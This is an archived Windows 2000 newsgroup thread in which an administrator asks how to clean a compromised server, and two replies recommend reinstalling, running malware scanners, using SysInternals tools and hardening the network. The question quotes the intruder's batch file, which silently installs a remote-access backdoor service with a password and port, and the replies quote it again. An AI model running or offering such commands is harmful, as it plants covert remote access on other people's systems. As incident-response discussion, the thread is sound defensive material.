Anyone know how to remove and verify these hacking tools a..

Archived from groups: microsoft.public.win2000,microsoft.public.win2000.group_policy,microsoft.public.win2000.security (More info?)

Hi,

We had a directory under c:\winnt\system32\ named OS2. It had a buch of
files like:
ndde.exe, nbthlp.exe, lssvc.exe, list.exe.

There looks like there was also a batch file with these commands in it:

regedit /s radmin.reg
nvsvc.exe /install /silence
nvsvc.exe /pass:Hack3d /port:5100 /save /silence
nvsvc.exe /start /silence
net start r_server

How can I check for installed services that are supposed to be running
silently? I'm concerned there are still backdoors on this server.

Thanks.

-- Kent Iler
----------------------------------------------------------------------
kent@iler.NOSPAM.com
Please CC: all replies via e-mail
Remove .NOSPAM from e-mail address
2 answers Last reply
More about anyone remove verify hacking tools
  1. Archived from groups: microsoft.public.win2000,microsoft.public.win2000.group_policy,microsoft.public.win2000.security (More info?)

    The only real way is to reinstall the operating system from scratch and
    harden it and your network to prevent the same from happening again. but
    there are some things you can try. First of course is to run an antivirus
    program with the latest definitions and also run a parasite detection
    removal program such as AdAware SE. Trend Micro has a great stand alone
    utility that also scans for and removes many common malwares. Just download
    Sysclean and the pattern file into the a folder to run from. Note that it is
    not unusual for an antivirus program to report nothing found when a second
    opinion will find a problem. Pest Patrol is also very good at finding a LOT
    of stuff on a computer such as trojans and keyboard loggers.

    http://www.trendmicro.com/download/dcs.asp -- Sysclean malware detection
    and removal.
    http://www.trendmicro.com/download/pattern.asp -- this is updated often
    http://www.microsoft.com/technet/security/chklist/w2ksvrcl.mspx -- good
    tips from Microsoft on how to harden your computer.
    http://www.pestpatrol.com/ -- Pest Patrol [now owned by Computer
    Associates]

    SysInternals provides some great free tools to help analyze your computer to
    see if rouge processes are running. In particular download TCPView, Process
    Explorer, Autoruns, and PsList. TCPView will show what ports you computer is
    using and the associated process/executable, Process Explorer will give much
    more detailed info about processes and if you view a processes properties it
    will show the associated services and tcp/ip usage, Autoruns will show
    startup programs in various places on the computer and let you disable them,
    and PsList is a command line process viewer which you should use to view
    running processes locally and when shown from a remote computer to compare
    the results. A hidden service or root kit infection may not show when
    processes are enumerated locally but they will when shown from another
    computer on the network, which you can do with PsList. If you do find a
    hidden process that can not be remove by normal means you might try scanning
    the computer from another computer on the network or even one of the free
    online services. --- Steve

    http://www.sysinternals.com/ntw2k/freeware/pslist.shtml -- PsList
    http://www.sysinternals.com/ntw2k/source/tcpview.shtml -- TCPView and
    SysInternals website.

    "Kent P. Iler" <kent@iler.NOSPAM.com> wrote in message
    news:ljBed.415094$mD.112414@attbi_s02...
    > Hi,
    >
    > We had a directory under c:\winnt\system32\ named OS2. It had a buch of
    > files like:
    > ndde.exe, nbthlp.exe, lssvc.exe, list.exe.
    >
    > There looks like there was also a batch file with these commands in it:
    >
    > regedit /s radmin.reg
    > nvsvc.exe /install /silence
    > nvsvc.exe /pass:Hack3d /port:5100 /save /silence
    > nvsvc.exe /start /silence
    > net start r_server
    >
    > How can I check for installed services that are supposed to be running
    > silently? I'm concerned there are still backdoors on this server.
    >
    > Thanks.
    >
    > -- Kent Iler
    > ----------------------------------------------------------------------
    > kent@iler.NOSPAM.com
    > Please CC: all replies via e-mail
    > Remove .NOSPAM from e-mail address
    >
    >
  2. Archived from groups: microsoft.public.win2000,microsoft.public.win2000.group_policy,microsoft.public.win2000.security (More info?)

    I agree with Steven. If your server has been compromised, reinstall it from
    scratch.

    More info would be needed in order to figure out how this happened. Your
    network needs a good firewall that blocks inbound traffic you don't want
    coming in. Did you have FTP access open inbound? Do you have good antivirus
    software? Auditing enabled? All servers & workstations patched with the
    latest patches/hotfixes? Do you allow anyone to come in & plug in their own
    laptop on your network? Etc etc etc.


    Kent P. Iler wrote:
    > Hi,
    >
    > We had a directory under c:\winnt\system32\ named OS2. It had a buch
    > of files like:
    > ndde.exe, nbthlp.exe, lssvc.exe, list.exe.
    >
    > There looks like there was also a batch file with these commands in
    > it:
    >
    > regedit /s radmin.reg
    > nvsvc.exe /install /silence
    > nvsvc.exe /pass:Hack3d /port:5100 /save /silence
    > nvsvc.exe /start /silence
    > net start r_server
    >
    > How can I check for installed services that are supposed to be running
    > silently? I'm concerned there are still backdoors on this server.
    >
    > Thanks.
    >
    > -- Kent Iler
    > ----------------------------------------------------------------------
    > kent@iler.NOSPAM.com
    > Please CC: all replies via e-mail
    > Remove .NOSPAM from e-mail address
Ask a new question

Read More

Hacking Microsoft Windows